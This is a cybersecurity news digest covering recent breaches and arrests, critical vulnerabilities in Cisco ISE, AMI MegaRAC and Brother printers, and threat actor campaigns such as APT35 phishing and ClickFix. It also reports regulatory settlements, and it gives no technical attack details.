Major Incidents or Breaches

  • United Natural Foods Inc. (UNFI), a major supplier to Whole Foods, has restored its core systems and electronic ordering/invoicing platforms after a cyberattack. Details of the attack vector or threat actor have not been disclosed.
  • Hawaiian Airlines reported a cyberattack that disrupted access to some systems. Flight operations were not affected. The investigation is ongoing.
  • The U.S. Department of Justice charged a British national, alleged to be the threat actor “IntelBroker,” in connection with several high-profile breaches.
  • New South Wales Police arrested a former Western Sydney University student accused of repeatedly hacking university systems for personal gain, including manipulating parking and accessing data.
  • A Kansas City man pleaded guilty to hacking multiple organizations to promote his own cybersecurity services.
  • AT&T has agreed to a $177 million settlement following a data breach that resulted in customer information being leaked and sold on the dark web.
  • The “Cyber Fattah” hacktivist group leaked data from Saudi Games, amid increased hacktivist activity linked to regional tensions.

Newly Discovered Vulnerabilities

  • Researchers disclosed a critical vulnerability in the Open VSX Registry (“open-vsx[.]org”) that could allow attackers to take control of the registry and conduct supply chain attacks affecting millions of developers.
  • Cisco released updates to address two maximum-severity unauthenticated remote code execution vulnerabilities in Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC), which could allow attackers to gain root access.
  • CISA reported active exploitation of a maximum severity vulnerability in AMI MegaRAC Baseboard Management Controller (BMC) software, enabling server hijacking and potential bricking of affected systems.
  • A bug affecting 689 Brother printer models (and 53 models from other manufacturers) exposes default administrator passwords that can be generated remotely, putting devices at risk of unauthorized access.

Notable Threat Actor Activity

  • Iranian state-sponsored group APT35 (linked to the IRGC) is conducting spear-phishing campaigns targeting Israeli journalists, cybersecurity experts, and tech professionals using AI-powered phishing techniques.
  • Cybercriminals are exploiting open-source and publicly available tools to target financial institutions across Africa in attacks ongoing since at least July 2023.
  • Scattered Spider, a well-known threat actor, has shifted its targeting from global retailers to U.S.-based insurance firms, employing advanced TTPs.
  • Researchers observed a significant increase (517%) in ClickFix social engineering attacks using fake CAPTCHA verifications as an initial access vector. A new related method, FileFix, has emerged.
  • Ongoing phishing campaigns are abusing Microsoft 365’s “Direct Send” feature to send phishing emails as internal users, bypassing standard email security controls.
  • Bitdefender reported a surge in social engineering attacks targeting WhatsApp users, aiming to compromise accounts through various scam tactics.
  • New Trojan malware is targeting sensitive information stored in mobile device screenshots, including cryptocurrency wallet seed phrases.

Trends, Tools, or Tactics of Interest

  • Use of open-source and commodity tools by cybercriminals for targeting financial institutions is increasing, particularly in Africa.
  • Fake CAPTCHA (ClickFix) and document-based (FileFix) social engineering tactics are on the rise as initial access methods.
  • Abuse of Microsoft 365’s “Direct Send” feature is being used to bypass detection and facilitate internal phishing.
  • AI-powered phishing is being adopted by state-sponsored actors, as seen in APT35’s recent campaigns.
  • SaaS adoption continues to outpace the development of effective data resilience and security controls, increasing organizational risk.

Regulatory or Policy Developments

  • The U.S. Federal Trade Commission (FTC) approved $126 million in refunds to Fortnite users as part of a settlement over the use of “dark patterns” by Epic Games to induce unwanted purchases.
  • Microsoft has rolled out changes to Windows security architecture aimed at preventing outages similar to the 2024 CrowdStrike incident, improving system resilience and recovery.
  • AT&T’s $177 million settlement over a major data breach establishes compensation for affected users whose personal data was leaked.